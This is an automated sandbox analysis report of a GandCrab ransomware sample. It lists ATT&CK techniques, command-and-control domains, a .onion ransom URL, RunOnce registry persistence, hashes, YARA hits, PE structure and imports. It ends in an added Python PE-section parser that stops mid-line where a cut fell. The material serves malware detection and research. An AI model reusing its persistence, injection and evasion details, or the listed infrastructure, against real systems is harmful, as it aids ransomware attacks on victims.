Matched techniques by tactic (the number is the count shown in the matrix cell):
Initial Access: Replication Through Removable Media (1)
Execution: Native API (2)
Persistence: Registry Run Keys / Startup Folder (1)
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1)
Defense Evasion: Software Packing (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (11)
Credential Access: Input Capture (1)
Discovery: Peripheral Device Discovery (11); Account Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (1); System Information Discovery (44); Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (2)
Lateral Movement: Replication Through Removable Media (1)
Collection: Archive Collected Data (11); Input Capture (1)
Exfiltration: none
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (1); Proxy (1)
Network Effects: none
Remote Service Effects: none
Impact: Data Encrypted for Impact (1)

Full matrix as rendered (cells prefixed with a number are the matched techniques; rows are in the order shown in the report, columns in the order of the header):
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
1 Replication Through Removable Media | 2 Native API | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Software Packing | 1 Input Capture | 11 Peripheral Device Discovery | 1 Replication Through Removable Media | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Masquerading | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 44 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Proxy | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 2 System Network Configuration Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Behavior Graph (ID 694566; sample gI5xZdIxUs.exe; start date 31/08/2022; architecture WINDOWS; score 100). The graph image is not available in this extraction, so its nodes and edges are reproduced as a text tree:

Start (sandbox root)
  DNS/IP: nomoreransom.coin; nomoreransom.bit; 4 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures
  Started: gI5xZdIxUs.exe; isqmkp.exe; isqmkp.exe (two instances)

gI5xZdIxUs.exe (graph counters: 1 created registry value, 28 created files)
  DNS/IP: ipv4bot.whatismyipaddress.com
  Dropped: C:\Users\user\AppData\Roaming\...\isqmkp.exe (PE32)
  Signatures: Contains functionality to determine the online IP of the system; May check the online IP address of the machine; Uses nslookup.exe to query domains; Performs many domain queries via nslookup
  Started: nslookup.exe (three instances shown) plus 18 other processes

isqmkp.exe (dropped copy)
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

nslookup.exe (first instance)
  DNS/IP: dns1.soprodns.ru; nomoreransom.coin; 8.8.8.8.in-addr.arpa
  Started: conhost.exe

nslookup.exe (second instance)
  DNS/IP: 3 other IPs or domains
  Started: conhost.exe

nslookup.exe (third instance)
  DNS/IP: 3 other IPs or domains
  Started: conhost.exe

18 other processes (children of gI5xZdIxUs.exe)
  DNS/IP: nomoreransom.coin; 53 other IPs or domains
  Started: conhost.exe (three shown) plus 15 other processes

dns1.soprodns.ru
  Signature: May check the online IP address of the machine

Antivirus detection, submitted sample (Source / Detection / Scanner / Label):
  gI5xZdIxUs.exe   86%   Virustotal
  gI5xZdIxUs.exe   74%   Metadefender
  gI5xZdIxUs.exe   93%   ReversingLabs    Win32.Ransomware.GandCrab
  gI5xZdIxUs.exe  100%   Avira            TR/Dropper.Gen
  gI5xZdIxUs.exe  100%   Joe Sandbox ML

Antivirus detection, dropped files (Source / Detection / Scanner / Label):
  C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  100%   Avira            TR/Dropper.Gen
  C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  100%   Joe Sandbox ML

Antivirus detection, unpacked PE files (Source / Detection / Scanner / Label):
  1.2.gI5xZdIxUs.exe.fc60000.0.unpack   100%   Avira   TR/Dropper.Gen
  14.0.isqmkp.exe.f9d0000.0.unpack      100%   Avira   TR/Dropper.Gen
  20.2.isqmkp.exe.f9d0000.0.unpack      100%   Avira   TR/Dropper.Gen
  14.2.isqmkp.exe.f9d0000.0.unpack      100%   Avira   TR/Dropper.Gen
  1.0.gI5xZdIxUs.exe.fc60000.0.unpack   100%   Avira   TR/Dropper.Gen
  20.0.isqmkp.exe.f9d0000.0.unpack      100%   Avira   TR/Dropper.Gen

Antivirus detection, domains (Source / Detection / Scanner):
  nomoreransom.coin   2%   Virustotal
  nomoreransom.bit    1%   Virustotal
  gandcrab.bit        2%   Virustotal
  dns1.soprodns.ru    5%   Virustotal

Antivirus detection, URLs (Source / Detection / Scanner / Label):
  http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b   0%   URL Reputation   safe
  https://tox.chat/download.html                  0%   URL Reputation   safe
Contacted domains (Name / IP / Active / Malicious / Reputation; the Antivirus Detection column is empty for every row):
  nomoreransom.coin               unknown   unknown   true    unknown
  ipv4bot.whatismyipaddress.com   unknown   unknown   false   high
  nomoreransom.bit                unknown   unknown   true    unknown
  gandcrab.bit                    unknown   unknown   true    unknown
  dns1.soprodns.ru                unknown   unknown   true    unknown
  dns2.soprodns.ru                unknown   unknown   true    unknown
  8.8.8.8.in-addr.arpa            unknown   unknown   false   unknown
URLs found in memory or dropped files (Name / Source / Malicious / Antivirus Detection / Reputation):
  http://ipv4bot.whatismyipaddress.com/a          gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp   false   -                      high
  https://www.torproject.org/                     gI5xZdIxUs.exe, isqmkp.exe.1.dr                                                                          false   -                      high
  http://ipv4bot.whatismyipaddress.com/4          gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp   false   -                      high
  http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b   gI5xZdIxUs.exe, isqmkp.exe.1.dr                                                                          true    URL Reputation: safe   unknown
  http://ipv4bot.whatismyipaddress.com/           gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp   false   -                      high
  https://tox.chat/download.html                  gI5xZdIxUs.exe, isqmkp.exe.1.dr                                                                          false   URL Reputation: safe   unknown
                                      No contacted IP infos
                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:694566
                                      Start date and time:2022-08-31 23:56:48 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 5s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:gI5xZdIxUs.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:62
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.rans.troj.evad.winEXE@85/2@305/0
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 100% (good quality ratio 96%)
                                      • Quality average: 83.6%
                                      • Quality standard deviation: 24.5%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 43
                                      • Number of non-executed functions: 123
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.228.9
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time       Type        Description
23:57:59   Autostart   Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce   bwduumgtptl   "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
23:58:08   Autostart   Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce   bwduumgtptl   "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      No context
                                      Process:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2218
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:F97F9E17EAFDD0105A4E11BAFDE04B40
                                      SHA1:BA06A7ABE986A61B71889B80A6F9B02B22D40667
                                      SHA-256:4783424121E6C2F870DC931B374D20C62C764EDDC5769D2F536609ADC1226ABB
                                      SHA-512:778C4AAB55F6F0FE44DBC9A97F53B59EC8ED2E35901F77AFEBAEA57C738AD301412760709AB909B51335DDD7676CD8F8C1410C5751F2EF5CC74282BCD6C5F50E
                                      Malicious:false
Preview: 2218 identical non-printable bytes (rendered as dots; consistent with the 0.0 entropy above)
                                      Process:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):101710
                                      Entropy (8bit):5.97549755837271
                                      Encrypted:false
                                      SSDEEP:1536:dZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2LkvdQ:BBounVyFHpfMqqDL2/LkvdmYvQd2a
                                      MD5:F4758788F11A0DE8D11EB4B8C515FFBD
                                      SHA1:04C1326C595D62977F53037F91B3FB863D4039BA
                                      SHA-256:DFCE3F5E421DEAF40DAB26ABDF67D5873968DB47B6DDE38787B90FF2CEAB3C96
                                      SHA-512:49C27F1DFA7C78C99C9055772D04BC89CEA41DF2DF027A400C915195FC82E8904FD89974F30CC7FD484A998DB0AE4B6F5440B5BA02FC56D2BB1ECE98117FBC38
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: ditekSHen
                                      • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: kevoreilly
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This .R.Y6.m cannot be run in DOS mode....$........Tg..:4..:4..:4..4..:4..4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z.............................K.......................................p............@.............................U...8........`.......................P.......................................................................................text.............................. ..`.rdata...p.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B.l2..........`......................@..@........................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.9754370991350365
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:gI5xZdIxUs.exe
                                      File size:101710
                                      MD5:98a12ec721c098842fbfd7384d5a72ae
                                      SHA1:9dfd7d1746c8ae943f3dced0f85f0e3c6f5084f3
                                      SHA256:f83457d173841c7e944bc60b00c197ca93c864893c71902cf1b1a36decdd30a4
                                      SHA512:a0b74851a36115822bf619a1a767cd76f57539a87dbbd4d452f309839f903ad7d94937a46acdcbc1e41bb50e381fe0fd2394122ec1260f05722a578030973ed8
                                      SSDEEP:1536:YZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2LkvdQ:WBounVyFHpfMqqDL2/LkvdmYvQd2a
                                      TLSH:F8A3490972E1A0A3E1E20679E5756EE5456E3C103F2496EB3993378D69728F0AD3B703
                                      File Content Preview:MZ......................@...............................................!..L.!This .<].e.m cannot be run in DOS mode....$.........Tg..:4..:4..:4...4..:4...4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z...
                                      Icon Hash:00828e8e8686b000
                                      Entrypoint:0x10004bf0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x10000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH
                                      Time Stamp:0x5A8C5AD9 [Tue Feb 20 17:28:57 2018 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:6b11af918234585a966ca8fab046dc6c
Entrypoint preview (disassembly starting at 0x10004bf0):
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      mov dword ptr [ebp-0Ch], 00000001h
                                      mov eax, dword ptr [ebp+0Ch]
                                      mov dword ptr [ebp-08h], eax
                                      cmp dword ptr [ebp-08h], 01h
                                      jmp 00007F0364768A56h
                                      jmp 00007F0364768A7Ch
                                      jmp 00007F0364768A7Ah
                                      push 00000000h
                                      push 00000000h
                                      push 00000000h
                                      push 10004950h
                                      push 00000000h
                                      push 00000000h
                                      call dword ptr [1000A108h]
                                      mov dword ptr [ebp-04h], eax
                                      cmp dword ptr [ebp-04h], 00000000h
                                      je 00007F0364768A5Ch
                                      mov ecx, dword ptr [ebp-04h]
                                      push ecx
                                      call dword ptr [1000A10Ch]
                                      mov eax, dword ptr [ebp-0Ch]
                                      mov esp, ebp
                                      pop ebp
                                      retn 000Ch
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 5Ch
                                      push esi
                                      push 00000044h
                                      lea eax, dword ptr [ebp-58h]
                                      xorps xmm0, xmm0
                                      push 00000000h
                                      push eax
                                      mov esi, ecx
                                      movdqu dqword ptr [ebp-10h], xmm0
                                      call 00007F036476CE07h
                                      mov eax, dword ptr [10012A6Ch]
                                      add esp, 0Ch
                                      mov dword ptr [ebp-18h], eax
                                      mov dword ptr [ebp-1Ch], eax
                                      mov eax, dword ptr [10012A68h]
                                      or dword ptr [ebp-2Ch], 00000101h
                                      mov dword ptr [ebp-20h], eax
                                      xor eax, eax
                                      mov word ptr [ebp-28h], ax
                                      lea eax, dword ptr [ebp-10h]
                                      push eax
                                      lea eax, dword ptr [ebp-58h]
                                      mov dword ptr [ebp-58h], 00000044h
                                      push eax
                                      push 00000000h
                                      push 00000000h
                                      push 00000000h
                                      push 00000001h
                                      push 00000000h
                                      push 00000000h
                                      push esi
                                      push 00000000h
                                      call dword ptr [1000A164h]
                                      test eax, eax
                                      jne 00007F0364768A5Dh
                                      call dword ptr [1000A064h]
                                      pop esi
                                      mov esp, ebp
                                      pop ebp
                                      ret
                                      push dword ptr [ebp-10h]
                                      Programming Language:
                                      • [ C ] VS2013 build 21005
                                      • [IMP] VS2008 SP1 build 30729
                                      • [EXP] VS2013 build 21005
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 build 21005
Data directories (Name / Virtual Address / Virtual Size / Is in Section):
  IMAGE_DIRECTORY_ENTRY_EXPORT           0x104e0   0x55    .rdata
  IMAGE_DIRECTORY_ENTRY_IMPORT           0x10538   0xb4    .rdata
  IMAGE_DIRECTORY_ENTRY_RESOURCE         0x16000   0x200   .l2
  IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0       0x0
  IMAGE_DIRECTORY_ENTRY_SECURITY         0x0       0x0
  IMAGE_DIRECTORY_ENTRY_BASERELOC        0x15000   0xac4   .reloc
  IMAGE_DIRECTORY_ENTRY_DEBUG            0x0       0x0
  IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0       0x0
  IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0       0x0
  IMAGE_DIRECTORY_ENTRY_TLS              0x0       0x0
  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0       0x0
  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0       0x0
  IMAGE_DIRECTORY_ENTRY_IAT              0xa000    0x1fc   .rdata
  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0       0x0
  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0       0x0
  IMAGE_DIRECTORY_ENTRY_RESERVED         0x0       0x0
Sections (Name / Virtual Address / Virtual Size / Raw Size / Xored PE / ZLIB Complexity / File Type / Entropy / Characteristics):
  .text    0x1000    0x82e8   0x8400   False   0.4593690814393939   data   6.340223357377212     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
  .rdata   0xa000    0x70a6   0x7200   False   0.4923245614035088   data   6.181274430024402     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
  .data    0x12000   0xa80    0xc00    False   0.3160807291666667   data   3.1174892908286225    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  .CRT     0x13000   0x4      0x200    False   0.033203125          data   0.06116285224115448   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
  .rsrc    0x14000   0x1e0    0x200    False   0.52734375           data   4.7176788329467545    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
  .reloc   0x15000   0xac4    0xc00    False   0.7802734375         data   6.4568381269501165    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
  .l2      0x16000   0x200    0x200    False   0.52734375           data   4.7137725829467545    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources (Name / RVA / Size / Type / Language / Country):
  RT_MANIFEST   0x16060   0x17d   XML 1.0 document text   English   United States
Imports (DLL: imported functions):
  KERNEL32.dll: SetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
  USER32.dll: BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, SetWindowLongW
  GDI32.dll: TextOutW
  ADVAPI32.dll: FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
  SHELL32.dll: ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
  CRYPT32.dll: CryptStringToBinaryA, CryptBinaryToStringA
  WININET.dll: InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
  PSAPI.DLL: EnumDeviceDrivers, GetDeviceDriverBaseNameW
Exports (Name / Ordinal / Address):
  _ReflectiveLoader@0   1   0x10005ec0

Language of compilation system / Country where language is spoken:
  English   United States
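The static tables above record a section named .l2 (the basis of the "PE file contains sections with non-standard names" hit), a resource directory at RVA 0x16000 that resolves into .l2 rather than .rsrc, and per-section entropy. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: with only the standard library it walks the DOS header, PE signature, file header and section table of an on-disk PE, computes each section's 8-bit entropy, decodes the IMAGE_SCN_* characteristics, maps an RVA to its section (the report's "Is in Section" column) and flags section names outside a conventional set. It exercises itself on a minimal PE image it constructs inline, not on the sample; the set of "standard" section names is this example's assumption.

```python
import math
import struct

# Section names usually emitted by MSVC and common linkers. Anything outside this
# set gets flagged, which is the same idea behind the report's "PE file contains
# sections with non-standard names" hit on ".l2". The set is this example's own
# assumption, not the sandbox's rule.
STANDARD_SECTIONS = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc",
    ".bss", ".tls", ".CRT", ".xdata", ".debug", ".gfids", ".00cfg", ".didat",
}

# IMAGE_SCN_* bits from the PE/COFF specification.
SCN_FLAGS = {
    0x00000020: "CODE",
    0x00000040: "INITIALIZED_DATA",
    0x00000080: "UNINITIALIZED_DATA",
    0x02000000: "DISCARDABLE",
    0x20000000: "EXECUTE",
    0x40000000: "READ",
    0x80000000: "WRITE",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the metric used in the report."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> IMAGE_FILE_HEADER -> section table of an on-disk PE."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    off = e_lfanew + 4 + 20 + opt_size          # section table follows the optional header
    sections = []
    for _ in range(nsections):
        # IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        raw_name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, off)
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append({
            "name": name,
            "va": va,
            "vsize": vsize,
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 3),
            "flags": [label for bit, label in SCN_FLAGS.items() if chars & bit],
            "standard": name in STANDARD_SECTIONS,
        })
        off += 40
    return sections


def nonstandard_sections(pe: bytes) -> list:
    """Names of sections outside STANDARD_SECTIONS (".l2" for the sample in this report)."""
    return [s["name"] for s in parse_sections(pe) if not s["standard"]]


def section_for_rva(sections: list, rva: int):
    """Which section an RVA falls in: the report's "Is in Section" column, e.g. a resource
    directory at RVA 0x16000 mapping to .l2 rather than .rsrc."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def build_test_pe() -> bytes:
    """Constructed minimal 32-bit PE (not the sample): three sections, one named '.l2'."""
    opt_size = 0xE0                               # size of a PE32 optional header
    sec_defs = [                                  # (name, VirtualAddress, raw bytes, Characteristics)
        (b".text", 0x1000, bytes(range(256)) * 2, 0x60000020),             # CODE|EXECUTE|READ
        (b".rdata", 0x2000, b"A" * 0x200, 0x40000040),                     # INITIALIZED_DATA|READ
        (b".l2", 0x3000, b"\0" * 0x1F0 + b"MANIFEST" + b"\0" * 8, 0x40000040),
    ]
    raw_ptr = 0x200                               # first section at file alignment 0x200
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew at offset 0x3C -> 0x40
    nt = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sec_defs), 0x5A8C5AD9, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, remainder zeroed
    table, body = b"", b""
    for name, va, data, chars in sec_defs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va, len(data),
                             raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += data
    image = dos + nt + opt + table
    return image + b"\0" * (raw_ptr - len(image)) + body


if __name__ == "__main__":
    pe = build_test_pe()
    for s in parse_sections(pe):
        print(f"{s['name']:<8} va=0x{s['va']:x} raw=0x{s['raw_size']:x} "
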